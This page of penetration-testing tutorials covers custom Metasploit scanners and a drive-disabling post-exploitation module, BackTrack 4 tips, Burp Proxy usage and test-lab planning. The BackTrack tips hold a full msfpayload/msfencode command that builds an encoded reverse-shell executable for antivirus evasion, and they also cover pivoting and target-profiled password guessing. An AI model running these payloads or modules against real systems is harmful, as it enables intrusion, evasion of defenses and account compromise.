Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Save more on your purchases! discount-offer-chevron-icon
Savings automatically calculated. No voucher code required.
Arrow left icon
Explore Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Newsletter Hub
Free Learning
Arrow right icon
timer SALE ENDS IN
0 Days
:
00 Hours
:
00 Minutes
:
00 Seconds

How-To Tutorials - Security

174 Articles
article-image-metasploit-custom-modules-and-meterpreter-scripting
Packt
03 Jun 2014
10 min read
Save for later

Metasploit Custom Modules and Meterpreter Scripting

Packt
03 Jun 2014
10 min read
(For more resources related to this topic, see here.) Writing out a custom FTP scanner module Let's try and build a simple module. We will write a simple FTP fingerprinting module and see how things work. Let's examine the code for the FTP module: require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Scanner def initialize super( 'Name' => 'Apex FTP Detector', 'Description' => '1.0', 'Author' => 'Nipun Jaswal', 'License' => MSF_LICENSE ) register_options( [ Opt::RPORT(21), ], self.class) End We start our code by defining the required libraries to refer to. We define the statement require 'msf/core' to include the path to the core libraries at the very first step. Then, we define what kind of module we are creating; in this case, we are writing an auxiliary module exactly the way we did for the previous module. Next, we define the library files we need to include from the core library set. Here, the include Msf::Exploit::Remote::Ftp statement refers to the /lib/msf/core/exploit/ftp.rb file and include Msf::Auxiliary::Scanner refers to the /lib/msf/core/auxiliary/scanner.rb file. We have already discussed the scanner.rb file in detail in the previous example. However, the ftp.rb file contains all the necessary methods related to FTP, such as methods for setting up a connection, logging in to the FTP service, sending an FTP command, and so on. Next, we define the information of the module we are writing and attributes such as name, description, author name, and license in the initialize method. We also define what options are required for the module to work. For example, here we assign RPORT to port 21 by default. Let's continue with the remaining part of the module: def run_host(target_host) connect(true, false) if(banner) print_status("#{rhost} is running #{banner}") end disconnect end end We define the run_host method, which will initiate the process of connecting to the target by overriding the run_host method from the /lib/msf/core/auxiliary/scanner.rb file. Similarly, we use the connect function from the /lib/msf/core/exploit/ftp.rb file, which is responsible for initializing a connection to the host. We supply two parameters into the connect function, which are true and false. The true parameter defines the use of global parameters, whereas false turns off the verbose capabilities of the module. The beauty of the connect function lies in its operation of connecting to the target and recording the banner of the FTP service in the parameter named banner automatically, as shown in the following screenshot: Now we know that the result is stored in the banner attribute. Therefore, we simply print out the banner at the end and we disconnect the connection to the target. This was an easy module, and I recommend that you should try building simple scanners and other modules like these. Nevertheless, before we run this module, let's check whether the module we just built is correct with regards to its syntax or not. We can do this by passing the module from an in-built Metasploit tool named msftidy as shown in the following screenshot: We will get a warning message indicating that there are a few extra spaces at the end of line number 19. Therefore, when we remove the extra spaces and rerun msftidy, we will see that no error is generated. This marks the syntax of the module to be correct. Now, let's run this module and see what we gather: We can see that the module ran successfully, and it has the banner of the service running on port 21, which is Baby FTP Server. For further reading on the acceptance of modules in the Metasploit project, refer to https://github.com/rapid7/metasploit-framework/wiki/Guidelines-for-Accepting-Modules-and-Enhancements. Writing out a custom HTTP server scanner Now, let's take a step further into development and fabricate something a bit trickier. We will create a simple fingerprinter for HTTP services, but with a slightly more complex approach. We will name this file http_myscan.rb as shown in the following code snippet: require 'rex/proto/http' require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner def initialize super( 'Name' => 'Server Service Detector', 'Description' => 'Detects Service On Web Server, Uses GET to Pull Out Information', 'Author' => 'Nipun_Jaswal', 'License' => MSF_LICENSE ) end We include all the necessary library files as we did for the previous modules. We also assign general information about the module in the initialize method, as shown in the following code snippet: def os_fingerprint(response) if not response.headers.has_key?('Server') return "Unknown OS (No Server Header)" end case response.headers['Server'] when /Win32/, /(Windows/, /IIS/ os = "Windows" when /Apache// os = "*Nix" else os = "Unknown Server Header Reporting: "+response.headers['Server'] end return os end def pb_fingerprint(response) if not response.headers.has_key?('X-Powered-By') resp = "No-Response" else resp = response.headers['X-Powered-By'] end return resp end def run_host(ip) connect res = send_request_raw({'uri' => '/', 'method' => 'GET' }) return if not res os_info=os_fingerprint(res) pb=pb_fingerprint(res) fp = http_fingerprint(res) print_status("#{ip}:#{rport} is running #{fp} version And Is Powered By: #{pb} Running On #{os_info}") end end The preceding module is similar to the one we discussed in the very first example. We have the run_host method here with ip as a parameter, which will open a connection to the host. Next, we have send_request_raw, which will fetch the response from the website or web server at / with a GET request. The result fetched will be stored into the variable named res. We pass the value of the response in res to the os_fingerprint method. This method will check whether the response has the Server key in the header of the response; if the Server key is not present, we will be presented with a message saying Unknown OS. However, if the response header has the Server key, we match it with a variety of values using regex expressions. If a match is made, the corresponding value of os is sent back to the calling definition, which is the os_info parameter. Now, we will check which technology is running on the server. We will create a similar function, pb_fingerprint, but will look for the X-Powered-By key rather than Server. Similarly, we will check whether this key is present in the response code or not. If the key is not present, the method will return No-Response; if it is present, the value of X-Powered-By is returned to the calling method and gets stored in a variable, pb. Next, we use the http_fingerprint method that we used in the previous examples as well and store its result in a variable, fp. We simply print out the values returned from os_fingerprint, pb_fingerprint, and http_fingerprint using their corresponding variables. Let's see what output we'll get after running this module: Msf auxiliary(http_myscan) > run [*]192.168.75.130:80 is running Microsoft-IIS/7.5 version And Is Powered By: ASP.NET Running On Windows [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed Writing out post-exploitation modules Now, as we have seen the basics of module building, we can take a step further and try to build a post-exploitation module. A point to remember here is that we can only run a post-exploitation module after a target compromises successfully. So, let's begin with a simple drive disabler module which will disable C: at the target system: require 'msf/core' require 'rex' require 'msf/core/post/windows/registry' class Metasploit3 < Msf::Post include Msf::Post::Windows::Registry def initialize super( 'Name' => 'Drive Disabler Module', 'Description' => 'C Drive Disabler Module', 'License' => MSF_LICENSE, 'Author' => 'Nipun Jaswal' ) End We started in the same way as we did in the previous modules. We have added the path to all the required libraries we need in this post-exploitation module. However, we have added include Msf::Post::Windows::Registry on the 5th line of the preceding code, which refers to the /core/post/windows/registry.rb file. This will give us the power to use registry manipulation functions with ease using Ruby mixins. Next, we define the type of module and the intended version of Metasploit. In this case, it is Post for post-exploitation and Metasploit3 is the intended version. We include the same file again because this is a single file and not a separate directory. Next, we define necessary information about the module in the initialize method just as we did for the previous modules. Let's see the remaining part of the module: def run key1="HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\" print_line("Disabling C Drive") meterpreter_registry_setvaldata(key1,'NoDrives','4','REG_DWORD') print_line("Setting No Drives For C") meterpreter_registry_setvaldata(key1,'NoViewOnDrives','4','REG_DWORD') print_line("Removing View On The Drive") print_line("Disabled C Drive") end end #class We created a variable called key1, and we stored the path of the registry where we need to create values to disable the drives in it. As we are in a meterpreter shell after the exploitation has taken place, we will use the meterpreter_registry_setval function from the /core/post/windows/registry.rb file to create a registry value at the path defined by key1. This operation will create a new registry key named NoDrives of the REG_DWORD type at the path defined by key1. However, you might be wondering why we have supplied 4 as the bitmask. To calculate the bitmask for a particular drive, we have a little formula, 2^([drive character serial number]-1) . Suppose, we need to disable the C drive. We know that character C is the third character in alphabets. Therefore, we can calculate the exact bitmask value for disabling the C drive as follows: 2^ (3-1) = 2^2= 4 Therefore, the bitmask is 4 for disabling C:. We also created another key, NoViewOnDrives, to disable the view of these drives with the exact same parameters. Now, when we run this module, it gives the following output: So, let's see whether we have successfully disabled C: or not: Bingo! No C:. We successfully disabled C: from the user's view. Therefore, we can create as many post-exploitation modules as we want according to our need. I recommend you put some extra time toward the libraries of Metasploit. Make sure you have user-level access rather than SYSTEM for the preceding script to work, as SYSTEM privileges will not create the registry under HKCU. In addition to this, we have used HKCU instead of writing HKEY_CURRENT_USER, because of the inbuilt normalization that will automatically create the full form of the key. I recommend you check the registry.rb file to see the various available methods.
Read more
  • 0
  • 0
  • 8054

article-image-tips-and-tricks-backtrack-4
Packt
26 May 2011
7 min read
Save for later

Tips and Tricks on BackTrack 4

Packt
26 May 2011
7 min read
  BackTrack 4: Assuring Security by Penetration Testing Master the art of penetration testing with BackTrack         Read more about this book       (For more resources on this subject, see here.) Updating the kernel The update process is enough for updating the software applications. However, sometimes you may want to update your kernel, because your existing kernel doesn't support your new device. Please remember that because the kernel is the heart of the operating system, failure to upgrade may cause your BackTrack to be unbootable. You need to make a backup of your kernel and configuration. You should ONLY update your kernel with the one made available by the BackTrack developers. This Linux kernel is modified to make certain "features" available to the BackTrack users and updating with other kernel versions could disable those features.   Multiple Customized installations One of the drawbacks we found while using BackTrack 4 is that you need to perform a big upgrade (300MB to download) after you've installed it from the ISO or from the VMWare image provided. If you have one machine and a high speed Internet connection, there's nothing much to worry about. However, imagine installing BackTrack 4 in several machines, in several locations, with a slow internet connection. The solution to this problem is by creating an ISO image with all the upgrades already installed. If you want to install BackTrack 4, you can just install it from the newly created ISO image. You won't have to download the big upgrade again. While for the VMWare image, you can solve the problem by doing the upgrade in the virtual image, then copying that updated virtual image to be used in the new VMWare installation.   Efficient methodology Combining the power of both methodologies, Open Source Security Testing Methodology Manual (OSSTMM) and Information Systems Security Assessment Framework (ISSAF) does provide sufficient knowledge base to assess the security of an enterprise environment efficiently.   Can't find the dnsmap program In our testing, the dnsmap-bulk script is not working because it can't find the dnsmap program. To fix it, you need to define the location of the dnsmap executable. Make sure you are in the dnsmap directory (/pentest/enumeration/dns/dnsmap). Edit the dnsmap-bulk.sh file using nano text editor and change the following: dnsmap $i elif [[ $# -eq 2 ]] then dnsmap $i -r $2 to ./dnsmap $i elif [[ $# -eq 2 ]] then ./dnsmap $i -r $2 and save your changes.   fierce Version Currently, the fierce Version 1 included with BackTrack 4 is no longer maintained by the author (Rsnake). He has suggested using fierce Version 2 that is still actively maintained by Jabra. fierce Version 2 is a rewrite of fierce Version 1. It also has several new features such as virtual host detection, subdomain and extension bruteforcing, template based output system, and XML support to integrate with Nmap. Since fierce Version 2 is not released yet and there is no BackTrack package for it, you need to get it from the development server by issuing the Subversion check out command: #svn co https://svn.assembla.com/svn/fierce/fierce2/trunk/fierce2/ Make sure you are in the /pentest/enumeration directory first before issuing the above command. You may need to install several Perl modules before you can use fierce v2 correctly.   Relationship between "Vulnerability" and "Exploit" A vulnerability is a security weakness found in the system which can be used by the attacker to perform unauthorized operations, while the exploit is a piece of code (proof-of-concept or PoC) written to take advantage of that vulnerability or bug in an automated fashion.   CISCO Privilege modes There are 16 different privilege modes available for the Cisco devices, ranging from 0 (most restricted level) to 15 (least restricted level). All the accounts created should have been configured to work under the specific privilege level. More information on this is available at http://www.cisco.com/en/US/docs/ios/12_2t/12_2t13/feature/guide/ftprienh.html.   Cisco Passwd Scanner The Cisco Passwd Scanner has been developed to scan the whole bunch of IP addresses in a specific network class. This class can be represented as A, B, or C in terms of network computing. Each class has it own definition for a number of hosts to be scanned. The tool is much faster and efficient in handling multiple threads in a single instance. It discovers those Cisco devices carrying default telnet password "cisco". We have found a number of Cisco devices vulnerable to default telnet password "cisco".   Common User Passwords Profiler (CUPP) As a professional penetration tester you may find a situation where you hold the target's personal information but are unable to retrieve or socially engineer his e-mail account credentials due to certain variable conditions, such as, the target does not use the Internet often, doesn't like to talk to strangers on the phone, and may be too paranoid to open unknown e-mails. This all comes to guessing and breaking the password based on various password cracking techniques (dictionary or brute force method). CUPP is purely designed to generate a list of common passwords by profiling the target name, birthday, nickname, family member's information, pet name, company, lifestyle patterns, likes, dislikes, interests, passions, and hobbies. This activity serves as crucial input to the dictionary-based attack method while attempting to crack the target's e-mail account password.   Extract particular information from the exploits list Using the power of bash commands we can manipulate the output of any text file in order to retrieve meaningful data. This can be accomplished by typing in cat files.csv |grep '"' |cut -d";" -f3 on your console. It will extract the list of exploit titles from a files.csv. To learn the basic shell commands please refer to an online source at: http://tldp.org/LDP/abs/html/index.html.   "inline" and "stager" type payload An inline payload is a single self-contained shell code that is to be executed with one instance of an exploit. While the stager payload creates a communication channel between the attacker and victim machine to read-off the rest of the staging shell code to perform the specific task, it is often common practice to choose stager payloads because they are much smaller in size than inline payloads.   Extending attack landscape by gaining deeper access to the target's network that is inaccessible from outside Metasploit provides a capability to view and add new routes to the destination network using the "route add targetSubnet targetSubnetMask SessionId" command (for example, route add 10.2.4.0 255.255.255.0 1). The "SessionId" is pointing to the existing meterpreter session (also called gateway) created after successful exploitation. The "targetSubnet" is another network address (also called dual homed Ethernet IP-address) attached to our compromised host. Once you set a metasploit to route all the traffic through a compromised host session, we are then ready to penetrate further into a network which is normally non-routable from our side. This terminology is commonly known as Pivoting or Foot-holding.   Evading Antivirus Protection Using Metasploit Using a tool called msfencode located at /pentest/exploits/framework3, we can generate a self-protected executable file with encoded payload. This should be parallel to the msfpayload file generation process. A "raw" output from Msfpayload will be piped into Msfencode to use specific encoding technique before outputting the final binary. For instance, execute ./msfpayload windows/shell/reverse_tcp LHOST=192.168.0.3 LPORT=32323 R | ./msfencode -e x86/shikata_ga_nai -t exe > /tmp/tictoe.exe to generate an encoded version of a reverse shell executable file. We strongly suggest you to use the "stager" type payloads instead of "inline" payloads, as they have a greater probability of success in bypassing major malware defenses due to their indefinite code signatures.   Stunnel version 3 BackTrack also comes with Stunnel version 3. The difference with Stunnel version 4 is that the version 4 uses a configuration file. If you want to run the version 3 style command-line arguments, you can call the command stunnel or stunnel3 with all of the needed arguments. Summary In this article we will take a look at some tips and tricks to make the best use of BackTrack OS. Further resources on this subject: FAQs on BackTrack 4 [Article] BackTrack 4: Target Scoping [Article] BackTrack 4: Security with Penetration Testing Methodology [Article] Blocking Common Attacks using ModSecurity 2.5 [Article] Telecommunications and Network Security Concepts for CISSP Exam [Article] Preventing SQL Injection Attacks on your Joomla Websites [Article]
Read more
  • 0
  • 0
  • 7840

Packt
03 Sep 2013
11 min read
Save for later

Quick start – Using Burp Proxy

Packt
03 Sep 2013
11 min read
(For more resources related to this topic, see here.) At the top of Burp Proxy, you will notice the following three tabs: intercept: HTTP requests and responses that are in transit can be inspected and modified from this window options: Proxy configurations and advanced preferences can be tuned from this window history: All intercepted traffic can be quickly analyzed from this window If you are not familiar with the HTTP protocol or you want to refresh your knowledge, HTTP Made Really Easy, A Practical Guide to Writing Clients and Servers, found at http://www.jmarshall.com/easy/http/, represents a compact reference. Step 1 – Intercepting web requests After firing up Burp and configuring the browser, let's intercept our first HTTP request. During this exercise, we will intercept a simple request to the publisher's website: In the intercept tab, make sure that Burp Proxy is properly stopping all requests in transit by checking the intercept button. This should be marked as intercept is on. In the browser, type http://www.packtpub.com/ in the URL bar and press Enter. Back in Burp Proxy, you should be able to see the HTTP request made by the browser. At this stage, the request is temporarily stopped in Burp Proxy waiting for the user to either forward or stop it. For instance, press forward and return to the browser. You should see the home page of Packt Publishing as you would normally interact with the website. Again, type http://www.packtpub.com/ in the URL bar and press Enter. Let's press drop this time. Back in the browser, the page will contain the warning Burp proxy error: message was dropped by user. We have dropped the request, thus Burp Proxy did not forward the request to the server. As a result, the browser received a temporary HTML page with the warning message generated by Burp, instead of the original HTML content. Let's try one more time. Type http://www.packtpub.com/ in the URL bar of the browser and press Enter. Once the request is properly captured by Burp Proxy, the action button becomes active. Click on it to display the contextual menu. This is an important functionality as it allows you to import the current web request in any of the other Burp tools. You can already imagine the potentialities of having a set of integrated tools that allow you to manipulate and analyze web requests so easily. For example, if we want to decode the request, we can simply click on send to decoder. Burp Proxy In Burp Proxy, we can also decide to automatically forward all requests without waiting for the user to either forward or drop the communication. By clicking on the intercept button, it is possible to switch from intercept is on to intercept is off. Nevertheless, the proxy will record all requests in transit. Also, Burp Proxy allows you to automatically intercept all responses matching specific characteristics. Take a look at the numerous options available in the intercept server response section from within the Burp Proxy options tab. For example, it is possible to intercept the server's response only if the client's request was intercepted. This is extremely helpful while testing input validation vulnerabilities as we are generally interested in evaluating the server's responses for all tampered requests. Or else, you may only want to intercept and inspect responses having a specific return code (for example, 200 OK). Step 2 – Inspecting web requests Once a request is properly intercepted, it is possible to inspect the entire content, headers, and parameters, using one of the four Burp Proxy message analysis tabs: raw: This view allows you to display the web request in raw format within a simple text editor. This is a very handy visualization as it enables maximum flexibility for further changing the content. params: In this view, the focus is on user-supplied parameters (GET/POST parameters, cookies). This is particularly important in case of complex requests as it allows to consider all entry points for potential vulnerabilities. Whenever applicable, Burp Proxy will also automatically perform URL decoding. In addition, Burp Proxy will attempt to parse commonly used formats, including JSON. headers: Similarly, this view displays the HTTP header names and values in tabular form. hex: In case of binary content, it is useful to inspect the hexadecimal representation of the resource. This view allows to display a request as in a traditional hex editor. The history tab enables you to analyze all web requests transited through the proxy: Click on the history tab. At the top, Burp Proxy shows all the requests in the bundle. At the bottom, it displays the content of the request and response corresponding to the specific selection. If you have previously modified the request, Burp Proxy history will also display the modified version. Displaying HTTP requests and responses intercepted by Burp Proxy By double-clicking on one of the requests, Burp will automatically open a new window with the specific content. From this window, it is possible to browse all the captured communication using the previous and next buttons Back in the history tab, Burp Proxy displays several details for each item including the request method, URL, response's code, and length. Each request is uniquely identified by a number, visible in the left-hand side column. Click on the request identifier. Burp Proxy allows you to set a color for that specific item. This is extremely helpful to highlight important requests or responses. For example, during the initial application enumeration, you may notice an interesting request; you can mark it and get back later for further testing. Burp Proxy history is also useful when you have to evaluate a sequence of requests in order to reproduce a specific application behavior. Click on the display filter, at the top of the history list to hide irrelevant content. If you want to analyze all HTTP requests containing at least one parameter, select the show only parameterised checkbox. If you want to display requests having a specific response, just select the appropriate response code in the filter by status code selection. At this point, you may have already understood the potentialities of the tool to filter and reveal interesting traffic. In addition, when using Burp Suite Professional, you can also use the filter by search term option. This feature is particularly important when you need to analyze hundreds of requests or responses as you can filter relevant traffic only by using regular expressions or simply matching particular strings. Using this feature, you may also be able to discover sensitive information (for example, credentials) embedded in the intercepted pages. Step 3 – Tampering web requests As part of a typical security assessment, you will need to modify HTTP requests and analyze the web application responses. For example, to identify SQL injection vulnerabilities, it is important to inject common attack vectors (for example, a single quote) in all user-supplied input, including HTTP headers, cookies, and GET/POST parameters. If you want to refresh your knowledge on common web application vulnerabilities, the OWASP Top Ten Project article at https://www. owasp.org/index.php/Category:OWASP_Top_Ten_Project is a good starting point. Tampering web requests with Burp is as easy as editing strings in a text editor: Intercept a request containing at least one HTTP parameter. For example, you can point your browser to http://www.packtpub.com/books/all?keys=ASP. Go to Burp Proxy | Intercept. At this point, you should see the corresponding HTTP request. From the raw view, you can simply edit any aspect of the web request in transit. For example, you can change the value of the the GET parameter's keys value from ASP to PHP. Edit the request to look like the following: GET /books/all?keys=PHP HTTP/1.1Host: www.packtpub.comUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0)Gecko/20100101 Firefox/15.0.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-us,en;q=0.5Accept-Encoding: gzip, deflateProxy-Connection: keep-alive Click on forward and get back to the browser. This should result in a search query performed with the string PHP. You can verify it by simply checking the results in the HTML page. Although we have used the raw view to change the previous HTTP request, it is actually possible to use any of the Burp Proxy view. For example, in the params view, it is possible to add a new parameter by following these steps: Clicking on new (right side), from the Burp Proxy params view. Selecting the proper parameter type (URL, body, or cookie). URL should be used for GET parameters, whereas body denotes POST parameters. Typing the name and the value of the newly created parameter. Advanced features After practicing with the basic features provided by Burp Proxy, you are almost ready to experiment with more advanced configurations. Match and replace Let's imagine that you are testing an application designed for mobile devices using a standard browser from your computer. In most cases, the web server examines the user-agent provided by the browser to identify the specific platform and respond with customized resources that better fit mobile phones and tablets. Under these circumstances, you will particularly find the match and replace function, provided by Burp Proxy, very useful. Let's configure Burp Proxy in order to tamper the user-agent HTTP header field: In the options tab of Burp Proxy, scroll down to the match and replace section. Under the match and replace table, a drop-down list and two text fields allow to create a customized rule. Select request header from the drop-down list since we want to create a match condition pertaining to HTTP requests. Type ^User-Agent.*$ in the first text field. This field represents the match within the HTTP request. Burp Proxy's match and replace feature allows you to use simple strings as well as complex regular expressions. If you are not familiar with regular expressions, have a look at http://www.regular-expressions.info/quickstart. html. In the second text field, type Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/4h20+ (KHTML, like Gecko) Version/3.0 Mobile/1C25 Safari/419.3 or any other fake user-agent that you want to impersonate. Click add and verify that the new match has been added to the list; this button is shown here: Burp Proxy match and replace list Intercept a request, leave it to pass through the proxy, and verify that it has been automatically modified by the tool. Automatically modified HTTP header in Burp Proxy HTML modification Another interesting feature of Burp Proxy is the automatic HTML modification, that can be activated and configured in the appropriate section within Burp Proxy | options. By using this function, you can automatically remove JavaScript or modify HTML forms of all received HTTP responses. Some applications deploy client-side validation in the form of disabled HTML form fields or JavaScript code. If you want to verify the presence of server-side controls that enforce specific data formats, you would need to tamper the request with invalid data. In these situations, you can either manually tamper the request in the proxy or enable HTML modification to remove any client-side validation and use the browser in order to submit invalid data. This function can be also used to display hidden form fields. Let's see in practice how you can activate this feature: In Burp Proxy, go to options, scroll down to the HTML modification section. Numerous options are available in this section: unhide hidden form fields to display hidden HTML form fields, enable disabled form fields to submit all input forms present inside the HTML page, remove input field length limits to allow extra-long strings in the text fields, remove JavaScript form validation to make Burp Proxy all onsubmit handler JavaScript functions from HTML forms, remove all JavaScript to completely remove all JS scripts and remove object tags to remove embedded objects within the HTML document. Select the desired checkboxes to activate automatic HTML modification. Summary Using this feature, you will be able to understand whether the web application enforces server- side validation. For instance, some insecure applications use client-side validation only (for example, via JavaScript functions). You can activate the automatic HTML modification feature by selecting the remove JavaScript form validation checkbox in order to perform input validation testing directly from your browser. Resources for Article : Further resources on this subject: Visual Studio 2010 Test Types [Article] Ordered and Generic Tests in Visual Studio 2010 [Article] Manual, Generic, and Ordered Tests using Visual Studio 2008 [Article]  
Read more
  • 0
  • 0
  • 7779

article-image-planning-lab-environment
Packt
12 Apr 2013
10 min read
Save for later

Planning the lab environment

Packt
12 Apr 2013
10 min read
(For more resources related to this topic, see here.) Getting ready To get the best result after setting up your lab, you should plan it properly at first. Your lab will be used to practise certain penetration testing skills. Therefore, in order to properly plan your lab environment, you should first consider which skills you want to practise. Although you could also have non-common or even unique reasons to build a lab, I can provide you with the average list of skills one might need to practice: Essential skills Discovery techniques Enumeration techniques Scanning techniques Network vulnerability exploitation Privilege escalation OWASP TOP 10 vulnerabilities discovery and exploitation Password and hash attacks Wireless attacks Additional skills Modifying and testing exploits Tunneling Fuzzing Vulnerability research Documenting the penetration testing process All these skills are applied in real-life penetration testing projects, depending on its depth and the penetration tester's qualifications. The following skills could be practised at three lab types or their combinations: Network security lab Web application lab Wi-Fi lab I should mention that the lab planning process for each of the three lab types listed consists of the same four phases: Determining the lab environment requirements: This phase helps you to actually understand what your lab should include. In this phase, all the necessary lab environment components should be listed and their importance for practising different penetration testing skills should be assessed. Determining the lab environment size: The number of various lab environment components should be defined in this phase. Determining the required resources: The point of this phase is to choose which hardware and software could be used for building the lab with the specified parameters and fit it with what you actually have or are able to get. Determining the lab environment architecture: This phase designs the network topology and network address space How to do it... Now, I want to describe step by step how to plan a common lab combined of all three lab types listed in the preceding section using the following four-phase approach: Determine the lab environment requirements: To fit our goal and practise particular skills, the lab should contain the following components: Skills to practice Necessary components Discovery techniques Several different hosts with various OSs Firewall IPS Enumeration techniques Scanning techniques Network vulnerability exploitation OWASP TOP 10 vulnerabilities discovery and exploitation Web server Web application Database server Web Application Firewall Password and hash attacks Workstations Servers Domain controller FTP server Wireless attacks Wireless router Radius server Laptop or any other host with Wi-Fi adapter Modifying and testing exploits Any host Vulnerable network service Debugger Privilege escalation Any host Tunnelling Several hosts Fuzzing Any host Vulnerable network service Debugger Vulnerability research Documenting the penetration testing process Specialized software Now, we can make our component list and define the importance of each component for our lab (importance ranges between less important, Additional, and most important, Essential): Components Importance Windows server Essential Linux server Important FreeBSD server Additional Domain controller Important Web server Essential FTP Server Important Web site Essential Web 2.0 application Important Web Application Firewall Additional Database server Essential Windows workstation Essential Linux workstation Additional Laptop or any other host with Wi-Fi adapter Essential Wireless router Essential Radius server Important Firewall Important IPS Additional Debugger Additional Determine the lab environment size: In this step, we should decide how many instances of each component we need in our lab. We will count only the essential and important components' numbers, so let's exclude all additional components. This means that we've now got the following numbers: Components Number Windows server 2 Linux server 1 Domain controller 1 Web server 1 FTP Server 1 Web site 1 Web 2.0 application 1 Database server 1 Windows workstation 2 Host with Wi-Fi adapter 2 Wireless router 1 Radius server 1 Firewall 2 Determine required resources: Now, we will discuss the required resources: Server and victim workstations will be virtual machines based on VMWare Workstation 8.0. To run the virtual machines without any trouble, you will need to have an appropriate hardware platform based on a CPU with two or more cores and at least 4 GB RAM. Windows servers OSs will work under Microsoft Windows 2008 Server and Microsoft Windows Server 2003. We will use Ubuntu 12.04 LTS as a Linux server OS. Workstations will work under Microsoft Windows XP SP3 and Microsoft Windows 7. ASUS WL-520gc will be used as the LAN and WLAN router. Any laptop as the attacker's host. Samsung Galaxy Tab as the Wi-Fi victim (or other device supporting Wi-Fi). We will use free software as a web server, an FTP-server, and a web application, so there is no need for any hardware or financial resources to get these requirements. Determine the lab environment architecture: Now, we need to design our lab network and draw a scheme: Address space parameters DHCP server: 192.168.1.1 Gateway: 192.168.1.1 Address pool: 192.168.1.2-15 Subnet mask: 255.255.255.0 How it works... In the first step, we discovered which types of lab components we need by determining what could be used to practise the following skills: All OSs and network services are suitable for practicing discovery, enumeration, and scanning techniques and also for network vulnerability exploitation. We also need at least two firewalls – windows built-in software and router built-in firewall functions. Firewalls are necessary for learning different scanning techniques and firewall rules detection knowledge. Additionally, you can use any IPS for practicing evasion techniques. A web server, a website, and a web application are necessary for learning how to disclose and exploit OWASP TOP 10 vulnerabilities. Though a Web Application Firewall (WAF) is not necessary, it helps to improve web penetration testing skills to higher level. An FTP service ideally fits to practice password brute-forcing. Microsoft domain services are necessary to understand and try Windows domain passwords and hash attacks including relaying. This is why we need at least one network service with remote password authentication and at least one Windows domain controller with two Windows workstations. A wireless access point is essential for performing various wireless attacks, but it is better to combine LAN router and Wi-Fi access point in one device. So, we will use Wi-Fi router with several LAN ports. A radius server is necessary for practicing attacks on WLAN with WPA-Enterprise security. A Laptop and a tablet PC with any Wi-Fi adapters will work as an attacker, and victim in wireless attacks. Tunnelling techniques could be practiced at any two hosts; it does not matter whether we use Windows or any other OS. Testing and modifying exploits as well as fuzzing and vulnerability research need a debugger installed on a vulnerable host. To properly document a penetration testing process, one can use just any test processor software, but there are several specialized software solutions, which make a thing much more comfortable and easier. In the second step, we determined which software and hardware we can use as instances of chosen component types and set their importance based on a common lab for a basic and intermediate professional level penetration tester. In the third step, we understood which solutions will be suitable for our tasks and what we can afford. I have tried to choose a cheaper option, which is why I am going to use virtualization software. The ASUS WL-520gc router combines the LAN router and Wi-Fi access point in the same device, so it is cheaper and more comfortable than using dedicated devices. A laptop and a tablet PC are also chosen for practising wireless attacks, but it is not the cheapest solution. In the fourth step, we designed our lab network based on determined resources. We have chosen to put all the hosts in the same subnet to set up the lab in an easier way. The subnet has its own DHCP server to dynamically assign network addresses to hosts. There's more... Let me give you an account of alternative ways to plan the lab environment details. Lab environment components variations It is not necessary to use a laptop as the attacker machine and a tablet PC as the victim – you just need two PCs with connected Wi-Fi adapters to perform various wireless attacks. As an alternative to virtual machines, a laptop, and a tablet PC or old unused computers (if you have them) could also be used to work as hardware hosts. There is only one condition – their hardware resources should be enough for planned OSs to work. An IPS could be either a software or hardware, but hardware systems are more expensive. For our needs, it is enough to use any freeware Internet security software including both the firewall and IPS functionality. It is not essential to choose the same OS as I have chosen in this chapter; you can use any other OSs that support the required functionality. The same is true about network services – it is not necessary to use an FTP service; you can use any other service that supports network password authentication such as telnet and SSH. You will have to additionally install any debugger on one of the victim's workstations in order to test the new or modified exploits and perform vulnerability research, if you need to. Finally, you can use any other hardware or virtual router that supports LAN routing and Wi-Fi access point functionality. A connected, dedicated LAN router and Wi-Fi access point are also suitable for the lab. Choosing virtualization solutions – pros and cons Here, I want to list some pros and cons of the different virtualization solutions in table format: Solution Pros Cons VMWare ESXi Enterprise solution Powerful solution Easily supports a lot of virtual machines on the same physical server as separate partitions No need to install the OS Very high cost Requires a powerful server Requires processor virtualization support VMWare workstation Comfortable to work with User friendly GUI Easy install Virtual *nix systems work fast Better works with virtual graphics Shareware It sometimes faces problems with USB Wi-Fi adapters on Windows 7 Demanding towards system resources Does not support 64-bit guest OS Virtual Windows systems work slowly VMWare player Freeware User-friendly GUI Easy to install Cannot create new virtual machines Poor functionality Micrisoft Virtual PC Freeware Great compatibility and stability with Microsoft systems Good USB support Easy to install Works only on Windows and only with Windows Does not support a lot of features that concurrent solutions do Oracle Virtual Box Freeware Virtual Windows systems work fast User-friendly GUI Easy to install Works on Mac OS and Solaris as well as on Windows and Linux Supports the "Teleportation" technology Paid USB support; Virtual *nix systems work slowly Here, I have listed only the leaders of the virtualization market in my opinion. Historically, I am mostly accustomed to VMWare Workstation, but of course, you can choose any other solutions that you may like. You can find more comparison info at http://virt.kernelnewbies.org/TechComparison. Summary This article explained how you can plan your lab environment. Resources for Article : Further resources on this subject: FAQs on BackTrack 4 [Article] CISSP: Vulnerability and Penetration Testing for Access Control [Article] BackTrack 4: Target Scoping [Article]
Read more
  • 0
  • 0
  • 7726

article-image-dpm-feature-set
Packt
29 Jul 2011
3 min read
Save for later

The DPM Feature Set

Packt
29 Jul 2011
3 min read
